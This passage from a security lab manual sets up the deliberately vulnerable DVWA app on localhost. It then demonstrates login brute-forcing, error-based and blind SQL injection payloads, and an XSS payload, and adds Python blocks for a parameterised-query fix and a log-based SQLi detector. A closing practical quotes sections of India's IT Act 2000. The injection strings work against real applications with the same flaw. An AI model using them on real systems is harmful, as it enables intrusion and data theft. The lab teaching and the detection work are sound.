C:\xampp\mysql\bin\mysqladmin -u root password 123456
Now, you can download DVWA from https://github.com/RandomStorm/DVWA , unzip it to
C:\xampp\htdocs\dvwa,
then modify its configuration file, which is
C:\xampp\htdocs\dvwa\config\config.inc.php:
$_DVWA[ 'db_server' ] = 'localhost';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = '123456';
$_DVWA[ 'default_security_level' ] = 'low';
Open http://127.0.0.1/dvwa/setup.php
Click "Create/Reset Database" to finish the installation.
Access the front page of it and it will redirect to
http://127.0.0.1/DVWA/login.php

Now, a basic test environment is available.

2. DVWA Brute Force
The first challenge of DVWA is how to log in to it. Usually, you can search the network and get the
default username/password, or try to use SQL Injection to bypass the authentication mechanism, such
as using a username like admin';-- or other ways.
Here we will use brute force, with WebCruiser Web Vulnerability Scanner 3
(http://www.janusec.com/ ) as the brute force tool.
First, input any username and password, such as 123, 456, etc., and submit.

Switch to Resend tab:

We find there is a request list which includes the requests we just submitted. Note that there is a
button "Bruter"; click it and it will switch to the Bruter tool.
The username and password fields have been identified automatically.
The dictionary files are located in the same directory as WebCruiserWVS.exe and can be
customized.

Click "Go" to start the guessing process; the results will be listed in the window.
Log in with the username and password.
3. SQL Injection
Select “SQL Injection” menu, input 1 and submit:

44
Input 1’ to try:

MySQL throw exception because of unpaired single quotes.


Now we can suspect that there is a SQL injection vulnerability here. Continue by trying 1 and 1=1 and
1 and 1=2

But the result is not as expected, so integer-type SQL injection is ruled out. Continue by trying
1' and '1'='1 and 1' and '1'='2

No result is returned when we enter 1' and '1'='2

So far we can conclude that there is a string-type SQL injection vulnerability here. Recap:
Criterion of SQL Injection
Assume the initial response is Response0, the response after appending a true condition is Response1,
and the response after appending a false condition is Response2.

If Response1 = Response0 but Response1 != Response2, SQL injection exists. OK, can you take over
some data by exploiting it?
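The criterion above, applied to a miniature copy of the DVWA lookup. This is an added example, not DVWA's own PHP: the table, its three rows and the two lookup functions are constructed here with sqlite3 so it runs offline, with the "low" string-concatenation query beside a parameterised one.

```python
import sqlite3

# Constructed stand-in for the DVWA users table (assumption: these sample rows).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT)")
conn.executemany(
    "INSERT INTO users VALUES (?, ?, ?)",
    [("1", "admin", "admin"), ("2", "Gordon", "Brown"), ("3", "Hack", "Me")],
)


def render(rows) -> str:
    """Format rows the way the DVWA page prints them."""
    return "\n".join(f"First name: {f}\nSurname: {s}" for f, s in rows)


def vulnerable_lookup(user_id: str) -> str:
    """The 'low' pattern: user input is spliced into the SQL text, so a suffix
    such as ' and '1'='1 becomes part of the WHERE clause and an unpaired
    quote makes the database raise, as seen on the page."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    try:
        return render(conn.execute(sql).fetchall())
    except sqlite3.OperationalError as exc:
        return f"ERROR: {exc}"


def hardened_lookup(user_id: str) -> str:
    """Same query with a bound parameter: the input is data, never SQL."""
    rows = conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()
    return render(rows)


def sqli_suspected(lookup, base_id: str = "1") -> bool:
    """The page's criterion for a string-type injection point:
    Response0 = base input, Response1 = base + true condition,
    Response2 = base + false condition; injection is suspected when
    Response1 == Response0 and Response1 != Response2."""
    response0 = lookup(base_id)
    response1 = lookup(base_id + "' and '1'='1")  # always-true suffix
    response2 = lookup(base_id + "' and '1'='2")  # always-false suffix
    return response1 == response0 and response1 != response2


if __name__ == "__main__":
    print("unpaired quote ->", vulnerable_lookup("1'"))
    print("vulnerable flagged:", sqli_suspected(vulnerable_lookup))  # True
    print("hardened flagged:", sqli_suspected(hardened_lookup))  # False
```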
Try: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select 1 from ( select
count(*),concat((select database()),0x3a,floor(rand(0)*2)) x from information_schema.tables group
by x)a)%23

Well, the database name "dvwa" is returned on the page.


This case is a little more complex: it intentionally provokes an error (a duplicate-key error in the
GROUP BY over the value computed from rand()), and the error message carries the database name.
Another way is blind SQL injection: guess the length of the field and then the ASCII code of each of
its bytes. To test whether the length of the database name is greater than 10:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select
char_length(database()))>10 and '1'='1

Right; continue guessing until:


http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select
char_length(database()))=4 and '1'='1

So the length is 4.


Continue by guessing each byte of it:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select
ord(substr(database(),1,1)) )=100 and %271%27=%271

The ASCII code of the first byte is 100, which is d, and so on.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select
ord(substr(database(),2,1)) )=118 and %271%27=%271 , the second byte is v .
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select
ord(substr(database(),3,1)) )=119 and %271%27=%271 , the third byte is w .
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select
ord(substr(database(),4,1)) )=97 and %271%27=%271 , the fourth byte is a . So the full name of the
database is "dvwa".
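From the defender's side, the probing sequence of this section (unpaired quote, boolean suffix, then length and byte guesses against database()) leaves a recognisable trail in the web server access log. The detector below is an added example, not part of the lab manual; its log lines are constructed to mirror the requests sent to DVWA above, and the client addresses and timestamps are made up.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed access log (common log format) mirroring the requests above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4312
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit HTTP/1.1" 200 4401
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+and+%271%27%3D%272&Submit=Submit HTTP/1.1" 200 4201
10.0.0.5 - - [01/Jan/2024:10:00:14 +0000] "GET /dvwa/vulnerabilities/sqli/?Submit=Submit&id=1%27+and+(select+char_length(database()))%3E10+and+%271%27%3D%271 HTTP/1.1" 200 4201
10.0.0.5 - - [01/Jan/2024:10:00:20 +0000] "GET /dvwa/vulnerabilities/sqli/?Submit=Submit&id=1%27+and+(select+ord(substr(database(),1,1))+)%3D100+and+%271%27%3D%271 HTTP/1.1" 200 4312
10.0.0.7 - - [01/Jan/2024:10:01:00 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4310
10.0.0.7 - - [01/Jan/2024:10:01:03 +0000] "GET /dvwa/index.php HTTP/1.1" 200 9876
"""

# client, identity, user, [timestamp], "METHOD target PROTOCOL", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r"(?P<status>\d{3}) (?P<size>\S+)"
)

# Each signature is matched against the URL-decoded value of a query parameter.
SIGNATURES = [
    ("unpaired quote", re.compile(r"^\d+'$")),
    ("boolean suffix", re.compile(r"\band\s*'1'\s*=\s*'[12]", re.I)),
    ("blind length probe", re.compile(r"char_length\s*\(", re.I)),
    ("blind byte probe", re.compile(r"ord\s*\(\s*substr\s*\(", re.I)),
    ("schema enumeration", re.compile(r"information_schema|database\s*\(\s*\)", re.I)),
]


def analyse_line(line: str):
    """Return (ip, path, [labels]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    labels = []
    # parse_qs percent-decodes and turns '+' into spaces, so %271%27 becomes '1'
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            for label, pattern in SIGNATURES:
                if pattern.search(value):
                    labels.append(f"{label} in {name}")
    return m["ip"], parts.path, labels


def detect(log_text: str):
    """Flagged requests only: a list of (ip, path, labels) with at least one hit."""
    events = []
    for line in log_text.splitlines():
        parsed = analyse_line(line)
        if parsed and parsed[2]:
            events.append(parsed)
    return events


def summarize(events):
    """Per client: flagged request count, distinct techniques, and a campaign flag
    that is set when a boolean suffix is combined with a length or byte probe,
    which distinguishes systematic guessing from a single stray quote."""
    per_ip = defaultdict(lambda: {"flagged": 0, "techniques": set(), "campaign": False})
    for ip, _path, labels in events:
        per_ip[ip]["flagged"] += 1
        per_ip[ip]["techniques"].update(label.split(" in ")[0] for label in labels)
    for entry in per_ip.values():
        probes = {"blind length probe", "blind byte probe"} & entry["techniques"]
        entry["campaign"] = "boolean suffix" in entry["techniques"] and bool(probes)
    return dict(per_ip)
```

Run detect(SAMPLE_LOG) and summarize(...) to see the four flagged requests from 10.0.0.5 and the campaign verdict; the ordinary id=1 and id=2 lookups from both clients are left alone.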
Is there a tool that can do these tests instead?
Yes, we can use a web application security scanner to do it.
Take WebCruiser as an illustration: navigate to the page and click "ScanURL":

SQL injection vulnerabilities are found. Right-click the vulnerability and select "SQL INJECTION POC",
then click "Get Environment Information":

4. XSS
Select XSS from the menu, http://127.0.0.1/dvwa/vulnerabilities/xss_s/

Enter text and script directly in the title and content fields, such as:
testinput<img src=0 onerror="alert(123456)"> Or use the scanner; it finds 2 XSS vulnerabilities.

Note: To improve efficiency, WebCruiser Web Vulnerability Scanner can scan a designated
vulnerability type (Setting) or a designated URL (ScanURL button) separately.

PRACTICAL: 10

AIM: Case Study on Indian IT ACT 2000.

An Act to provide legal recognition for transactions carried out by means of electronic data
interchange and other means of electronic communication, commonly referred to as "electronic
commerce", which involve the use of alternatives to paper-based methods of communication and
storage of information, to facilitate electronic filing of documents with the Government agencies.

Some sections of the IT Act are described below.

43. Penalty for damage to computer, computer system, etc.

If any person without permission of the owner or any other person who is in charge of a computer,
computer system or computer network, —

(a) Accesses or secures access to such computer, computer system or computer network;

(b) Downloads, copies or extracts any data, computer data base or information from such computer,
computer system or computer network including information or data held or stored in any removable
storage medium;

(c) Introduces or causes to be introduced any computer contaminant or computer virus into any
computer, computer system or computer network;

(d) Damages or causes to be damaged any computer, computer system or computer network, data,
computer data base or any other programme residing in such computer, computer system or
computer network;

(e) Disrupts or causes disruption of any computer, computer system or computer network;

(f) Denies or causes the denial of access to any person authorized to access any computer, computer
system or computer network by any means;

(g) Provides any assistance to any person to facilitate access to a computer, computer system or
computer network in contravention of the provisions of this Act, rules or regulations made
thereunder;

(h) Charges the services availed of by a person to the account of another person by tampering with or
manipulating any computer, computer system, or computer network, he shall be liable to pay damages by
way of compensation not exceeding one crore rupees to the person so affected.

Explanation.—For the purposes of this section,—

(i) "Computer contaminant" means any set of computer instructions that are designed—

(a) To modify, destroy, record, transmit data or programme residing within a computer, computer
system or computer network; or

(b) By any means to usurp the normal operation of the computer, computer system, or computer
network;

(ii) "Computer data base" means a representation of information, knowledge, facts, concepts or
instructions in text, image, audio, video that are being prepared or have been prepared in a formalised
manner or have been produced by a computer, computer system or computer network and are intended for
use in a computer, computer system or computer network;

(iii) "Computer virus" means any computer instruction, information, data or programme that destroys,
damages, degrades or adversely affects the performance of a computer resource or attaches itself to
another computer resource and operates when a programme, data or instruction is executed or
some other event takes place in that computer resource;

(iv) "Damage" means to destroy, alter, delete, add, modify or rearrange any computer resource by
any means.

44. Penalty for failure to furnish information, return, etc.

If any person who is required under this Act or any rules or regulations made thereunder to—

(a) Furnish any document, return or report to the Controller or the Certifying Authority fails to furnish
the same, he shall be liable to a penalty not exceeding one lakh and fifty thousand rupees for each
such failure;

(b) File any return or furnish any information, books or other documents within the time specified
therefor in the regulations fails to file return or furnish the same within the time specified therefor in
the regulations, he shall be liable to a penalty not exceeding five thousand rupees for every day during
which such failure continues;

(c) Maintain books of account or records, fails to maintain the same, he shall be liable to a penalty
not exceeding ten thousand rupees for every day during which the failure continues.

52. Salary, allowances and other terms and conditions of service of Presiding Officer.

The salary and allowances payable to, and the other terms and conditions of service including
pension, gratuity and other retirement benefits of, the Presiding Officer of a Cyber Appellate
Tribunal shall be such as may be prescribed: Provided that neither the salary and allowances nor the
other terms and conditions of service of the Presiding Officer shall be varied to his disadvantage
after appointment.

61. Civil court not to have jurisdiction.

No court shall have jurisdiction to entertain any suit or proceeding in respect of any matter which
an adjudicating officer appointed under this Act or the Cyber Appellate Tribunal constituted under
this Act is empowered by or under this Act to determine and no injunction shall be granted by any
court or other authority in respect of any action taken or to be taken in pursuance of any power
conferred by or under this Act.

62. Appeal to High Court.

Any person aggrieved by any decision or order of the Cyber Appellate Tribunal may file an appeal
to the High Court within sixty days from the date of communication of the decision or order of the
Cyber Appellate Tribunal to him on any question of fact or law arising out of such order: Provided
that the High Court may, if it is satisfied that the appellant was prevented by sufficient cause from
filing the appeal within the said period, allow it to be filed within a further period not exceeding sixty
days.

64. Recovery of penalty.

A penalty imposed under this Act, if it is not paid, shall be recovered as an arrear of land revenue and
the licence or the Digital Signature Certificate, as the case may be, shall be suspended till the penalty is
paid.

65. Tampering with computer source documents.

Whoever knowingly or intentionally conceals, destroys or alters or intentionally or knowingly causes
another to conceal, destroy or alter any computer source code used for a computer, computer
programme, computer system or computer network, when the computer source code is required to be
kept or maintained by law for the time being in force, shall be punishable with imprisonment up to three
years, or with fine which may extend up to two lakh rupees, or with both.

Explanation.—For the purposes of this section, "computer source code" means the listing of
programmes, computer commands, design and layout and programme analysis of computer
resource in any form.

66. Hacking with computer system.

(1) Whoever with the intent to cause or knowing that he is likely to cause wrongful loss or damage
to the public or any person destroys or deletes or alters any information residing in a computer
resource or diminishes its value or utility or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine
which may extend up to two lakh rupees, or with both.

67. Publishing of information which is obscene in electronic form.

Whoever publishes or transmits or causes to be published in the electronic form, any material which
is lascivious or appeals to the prurient interest or if its effect is such as to tend to deprave and corrupt
persons who are likely, having regard to all relevant circumstances, to read, see or hear the matter
contained or embodied in it, shall be punished on first conviction with imprisonment of either
description for a term which may extend to five years and with fine which may extend to one lakh
rupees and in the event of a second or subsequent conviction with imprisonment of either description
for a term which may extend to ten years and also with fine which may extend to two lakh rupees.

68. Power of Controller to give directions.

(1) The Controller may, by order, direct a Certifying Authority or any employee of such Authority to
take such measures or cease carrying on such activities as specified in the order if those are necessary
to ensure compliance with the provisions of this Act, rules or any regulations made thereunder.

(2) Any person who fails to comply with any order under sub-section (1) shall be guilty of an offence
and shall be liable on conviction to imprisonment for a term not exceeding three years or to a fine not
exceeding two lakh rupees or to both.

69. Directions of Controller to a subscriber to extend facilities to decrypt information.

(1) If the Controller is satisfied that it is necessary or expedient so to do in the interest of the
sovereignty or integrity of India, the security of the State, friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence, for reasons
to be recorded in writing, by order, direct any agency of the Government to intercept any information
transmitted through any computer resource.

(2) The subscriber or any person in charge of the computer resource shall, when called upon by any
agency which has been directed under sub-section (1), extend all facilities and technical assistance to
decrypt the information.

70. Protected system.

(1) The appropriate Government may, by notification in the Official Gazette, declare that any
computer, computer system or computer network to be a protected system.

(2) The appropriate Government may, by order in writing, authorise the persons who are authorised
to access protected systems notified under sub-section (1).

(3) Any person who secures access or attempts to secure access to a protected system in contravention
of the provisions of this section shall be punished with imprisonment of either description for a term
which may extend to ten years and shall also be liable to fine.

71. Penalty for misrepresentation.

Whoever makes any misrepresentation to, or suppresses any material fact from, the Controller or the
Certifying Authority for obtaining any licence or Digital Signature Certificate, as the case may be,
shall be punished with imprisonment for a term which may extend to two years, or with fine which
may extend to one lakh rupees, or with both.

72. Penalty for breach of confidentiality and privacy.

Save as otherwise provided in this Act or any other law for the time being in force, any person who,
in pursuance of any of the powers conferred under this Act, rules or regulations made thereunder, has
secured access to any electronic record, book, register, correspondence, information, document or other
material without the consent of the person concerned discloses such electronic record, book,
register, correspondence, information, document or other material to any other person shall be
punished with imprisonment for a term which may extend to two years, or with fine which may
extend to one lakh rupees, or with both.

73. Penalty for publishing Digital Signature Certificate false in certain particulars.

(1) No person shall publish a Digital Signature Certificate or otherwise make it available to any other
person with the knowledge that—

(a) The Certifying Authority listed in the certificate has not issued it; or

(b) The subscriber listed in the certificate has not accepted it; or

(c) The certificate has been revoked or suspended, unless such publication is for the purpose of
verifying a digital signature created prior to such suspension or revocation.

(2) Any person who contravenes the provisions of sub-section (1) shall be punished with
imprisonment for a term which may extend to two years, or with fine which may extend to one lakh
rupees, or with both.

74. Publication for fraudulent purpose.

Whoever knowingly creates, publishes or otherwise makes available a Digital Signature Certificate
for any fraudulent or unlawful purpose shall be punished with imprisonment for a term which may
extend to two years, or with fine which may extend to one lakh rupees, or with both.

75. Act to apply for offence or contravention committed outside India.

(1) Subject to the provisions of sub-section (2), the provisions of this Act shall apply also to any
offence or contravention committed outside India by any person irrespective of his nationality.

(2) For the purposes of sub-section (1), this Act shall apply to an offence or contravention committed
outside India by any person if the act or conduct constituting the offence or contravention involves a
computer, computer system or computer network located in India.

76. Confiscation.

Any computer, computer system, floppies, compact disks, tape drives or any other accessories related
thereto, in respect of which any provision of this Act, rules, orders or regulations made thereunder
has been or is being contravened, shall be liable to confiscation: Provided that where it is established
to the satisfaction of the court adjudicating the confiscation that the person in whose possession,
power or control of any such computer, computer system, floppies, compact disks, tape drives or any
other accessories relating thereto is found is not responsible for the contravention of the provisions of
this Act, rules, orders or regulations made thereunder, the court may, instead of making an order
for confiscation of such computer, computer system, floppies, compact disks, tape drives or any other
accessories related thereto, make such other order authorised by this Act against the person
contravening the provisions of this Act, rules, orders or regulations made thereunder as it may
think fit.

77. Penalties or confiscation not to interfere with other punishments.

No penalty imposed or confiscation made under this Act shall prevent the imposition of any other
punishment to which the person affected thereby is liable under any other law for the time being in
force.

78. Power to investigate offences.

Notwithstanding anything contained in the Code of Criminal Procedure, 1973, a police officer not
below the rank of Deputy Superintendent of Police shall investigate any offence under this Act.

NETWORK SERVICE PROVIDERS NOT TO BE LIABLE IN CERTAIN CASES

79. Network service providers not to be liable in certain cases.

For the removal of doubts, it is hereby declared that no person providing any service as a network
service provider shall be liable under this Act, rules or regulations made thereunder for any third
party information or data made available by him if he proves that the offence or contravention was
committed without his knowledge or that he had exercised all due diligence to prevent the
commission of such offence or contravention.

Explanation.—for the purposes of this section, —

(a) "Network service provider" means an intermediary;

(b) "Third party information" means any information dealt with by a network service provider in his
capacity as an intermediary;

80. Power of police officer and other officers to enter, search, etc.

(1) Notwithstanding anything contained in the Code of Criminal Procedure, 1973, any police officer,
not below the rank of a Deputy Superintendent of Police, or any other officer of the Central
Government or a State Government authorised by the Central Government in this behalf may enter
any public place and search and arrest without warrant any person found therein who is reasonably
suspected of having committed or of committing or of being about to commit any offence under
this Act.

Explanation.—For the purposes of this sub-section, the expression "public place" includes any
public conveyance, any hotel, any shop or any other place intended for use by, or accessible to the
public.

(2) Where any person is arrested under sub-section (1) by an officer other than a police officer, such
officer shall, without unnecessary delay, take or send the person arrested before a magistrate having
jurisdiction in the case or before the officer-in-charge of a police station.

(3) The provisions of the Code of Criminal Procedure, 1973 shall, subject to the provisions of this
section, apply, so far as may be, in relation to any entry, search or arrest, made under this section.

81. Act to have overriding effect.

The provisions of this Act shall have effect notwithstanding anything inconsistent therewith
contained in any other law for the time being in force.

82. Controller, Deputy Controller and Assistant Controllers to be public servants.

The Presiding Officer and other officers and employees of a Cyber Appellate Tribunal, the Controller,
the Deputy Controller and the Assistant Controllers shall be deemed to be public servants within the
meaning of section 21 of the Indian Penal Code.

83. Power to give directions.

The Central Government may give directions to any State Government as to the carrying into
execution in the State of any of the provisions of this Act or of any rule, regulation or order made
thereunder.

84. Protection of action taken in good faith.

No suit, prosecution or other legal proceeding shall lie against the Central Government, the State
Government, the Controller or any person acting on behalf of him, the Presiding Officer, adjudicating
officers and the staff of the Cyber Appellate Tribunal for anything which is in good faith done or
intended to be done in pursuance of this Act or any rule, regulation or order made thereunder.

85. Offences by companies.

(1) Where a person committing a contravention of any of the provisions of this Act or of any rule,
direction or order made thereunder is a company, every person who, at the time the contravention
was committed, was in charge of, and was responsible to, the company for the conduct of business
of the company as well as the company, shall be guilty of the contravention and shall be liable to be
proceeded against and punished accordingly:

Provided that nothing contained in this sub-section shall render any such person liable to punishment
if he proves that the contravention took place without his knowledge or that he exercised all due
diligence to prevent such contravention.

(2) Notwithstanding anything contained in sub-section (1), where a contravention of any of the
provisions of this Act or of any rule, direction or order made thereunder has been committed by a
company and it is proved that the contravention has taken place with the consent or connivance of,
or is attributable to any neglect on the part of, any director, manager, secretary or other officer of the
company, such director, manager, secretary or other officer shall also be deemed to be guilty of the
contravention and shall be liable to be proceeded against and punished accordingly.

Explanation.—For the purposes of this section,—

(i) "Company" means any body corporate and includes a firm or other association of individuals; and

(ii) "Director", in relation to a firm, means a partner in the firm.

86. Removal of difficulties.

(1) If any difficulty arises in giving effect to the provisions of this Act, the Central Government may,
by order published in the Official Gazette, make such provisions not inconsistent with the provisions
of this Act as appear to it to be necessary or expedient for removing the difficulty:

Provided that no order shall be made under this section after the expiry of a period of two years from
the commencement of this Act.

(2) Every order made under this section shall be laid, as soon as may be after it is made, before each
House of Parliament.
